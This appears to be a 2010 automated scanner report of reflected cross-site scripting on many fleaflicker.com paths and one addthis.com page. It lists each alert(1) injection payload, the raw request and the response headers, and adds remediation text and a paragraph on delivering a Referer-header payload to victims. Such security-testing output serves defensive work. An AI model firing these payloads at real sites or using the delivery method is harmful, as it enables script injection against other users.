The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 971be'%3balert(1)//23f95009e1b was submitted in the REST URL parameter 1. This input was echoed as 971be';alert(1)//23f95009e1b in the application's response.
Request
GET /nfl971be'%3balert(1)//23f95009e1b/leaders HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4756
Keep-Alive: timeout=5, max=47
Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed5b5'%3balert(1)//c2940ad40a1 was submitted in the REST URL parameter 2. This input was echoed as ed5b5';alert(1)//c2940ad40a1 in the application's response.
Request
GET /nfl/leadersed5b5'%3balert(1)//c2940ad40a1 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4770
Keep-Alive: timeout=5, max=45
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ff4a'%3balert(1)//9781b566d73 was submitted in the REST URL parameter 1. This input was echoed as 8ff4a';alert(1)//9781b566d73 in the application's response.
Request
GET /nfl8ff4a'%3balert(1)//9781b566d73/most-added-dropped?tableOffset=20 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4767
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97f55'%3balert(1)//386f49016da was submitted in the REST URL parameter 2. This input was echoed as 97f55';alert(1)//386f49016da in the application's response.
Request
GET /nfl/most-added-dropped97f55'%3balert(1)//386f49016da?tableOffset=20 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4781
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fabe'%3balert(1)//82f8e90fb61 was submitted in the REST URL parameter 1. This input was echoed as 6fabe';alert(1)//82f8e90fb61 in the application's response.
Request
GET /nfl6fabe'%3balert(1)//82f8e90fb61/must-signin HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4760
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78241'%3balert(1)//ba5f290f92 was submitted in the REST URL parameter 2. This input was echoed as 78241';alert(1)//ba5f290f92 in the application's response.
Request
GET /nfl/must-signin78241'%3balert(1)//ba5f290f92 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4773
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99f59'%3balert(1)//f2a4a9d583b was submitted in the REST URL parameter 1. This input was echoed as 99f59';alert(1)//f2a4a9d583b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl99f59'%3balert(1)//f2a4a9d583b/news?tableOffset=7 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4753
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87e40'%3balert(1)//1e74970d2ee was submitted in the REST URL parameter 2. This input was echoed as 87e40';alert(1)//1e74970d2ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/news87e40'%3balert(1)//1e74970d2ee?tableOffset=7 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4767
Keep-Alive: timeout=5, max=34
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de495'%3balert(1)//9b7d4be09ac was submitted in the REST URL parameter 1. This input was echoed as de495';alert(1)//9b7d4be09ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nflde495'%3balert(1)//9b7d4be09ac/news-item HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4758
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 311e9'%3balert(1)//03673b1a4b0 was submitted in the REST URL parameter 2. This input was echoed as 311e9';alert(1)//03673b1a4b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/news-item311e9'%3balert(1)//03673b1a4b0 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4772
Keep-Alive: timeout=5, max=2
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40191'%3balert(1)//80a7ddc276d was submitted in the REST URL parameter 1. This input was echoed as 40191';alert(1)//80a7ddc276d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl40191'%3balert(1)//80a7ddc276d/player HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4755
Keep-Alive: timeout=5, max=63
Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e2e7'%3balert(1)//ce6f65c5085 was submitted in the REST URL parameter 2. This input was echoed as 6e2e7';alert(1)//ce6f65c5085 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/player6e2e7'%3balert(1)//ce6f65c5085 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4769
Keep-Alive: timeout=5, max=20
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e6dc'%3balert(1)//93e089e2b40 was submitted in the REST URL parameter 1. This input was echoed as 9e6dc';alert(1)//93e089e2b40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl9e6dc'%3balert(1)//93e089e2b40/scores HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4755
Keep-Alive: timeout=5, max=3
Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 792f9'%3balert(1)//26706f04041 was submitted in the REST URL parameter 2. This input was echoed as 792f9';alert(1)//26706f04041 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/scores792f9'%3balert(1)//26706f04041 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4769
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a6ba'%3balert(1)//742424c0741 was submitted in the REST URL parameter 1. This input was echoed as 1a6ba';alert(1)//742424c0741 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl1a6ba'%3balert(1)//742424c0741/signup HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4755
Keep-Alive: timeout=5, max=8
Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6ec7'%3balert(1)//f65cf9f44c2 was submitted in the REST URL parameter 2. This input was echoed as f6ec7';alert(1)//f65cf9f44c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/signupf6ec7'%3balert(1)//f65cf9f44c2 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4769
Keep-Alive: timeout=5, max=44
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8625'%3balert(1)//fbb77ca826c was submitted in the REST URL parameter 1. This input was echoed as c8625';alert(1)//fbb77ca826c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nflc8625'%3balert(1)//fbb77ca826c/world-rankings HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4763
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 693b2'%3balert(1)//130414cddf5 was submitted in the REST URL parameter 2. This input was echoed as 693b2';alert(1)//130414cddf5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nfl/world-rankings693b2'%3balert(1)//130414cddf5 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4777
Keep-Alive: timeout=5, max=39
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc173'%3balert(1)//2050295951 was submitted in the REST URL parameter 1. This input was echoed as dc173';alert(1)//2050295951 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nhldc173'%3balert(1)//2050295951/most-added-dropped HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:28:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4766
Keep-Alive: timeout=5, max=42
Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eaa54'%3balert(1)//906908e509f was submitted in the REST URL parameter 2. This input was echoed as eaa54';alert(1)//906908e509f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nhl/most-added-droppedeaa54'%3balert(1)//906908e509f HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:28:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4812
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63256'%3balert(1)//0577bdcebd3 was submitted in the REST URL parameter 1. This input was echoed as 63256';alert(1)//0577bdcebd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nhl63256'%3balert(1)//0577bdcebd3/news HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:27:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4753
Keep-Alive: timeout=5, max=9
Connection: Keep-Alive
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3dc07'%3balert(1)//265bd265ac0 was submitted in the REST URL parameter 2. This input was echoed as 3dc07';alert(1)//265bd265ac0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nhl/news3dc07'%3balert(1)//265bd265ac0 HTTP/1.1
Host: www.fleaflicker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: timeZoneOffset=300; s_pers=%20s_getnr%3D1292523996116-New%7C1355595996116%3B%20s_nrgvo%3DNew%7C1355595996117%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolfleaflicker%252Caolsvc%253D%252526pid%25253Dfle%25252520%2525253A%25252520Splash%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.fleaflicker.com/nfl/most-added-dropped%252526ot%25253DA%3B;
Response
HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 18:28:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 4798
Keep-Alive: timeout=5, max=52
Connection: Keep-Alive
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 94d3e<script>alert(1)</script>25b5f647a99 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability. The Referer header is, however, partly attacker-controlled even without such a technique: an attacker can host a page at a URL whose query string carries the payload and link the victim to /bookmark.php, and the browser sends that URL as the Referer. Whether the payload arrives intact then depends on the victim's browser. A browser that follows the WHATWG URL standard percent-encodes <, > and " in the query before sending, so those characters only reach the page as markup if the application URL-decodes the header before echoing it; older browsers sent them unencoded, as this probe did.
Request
GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
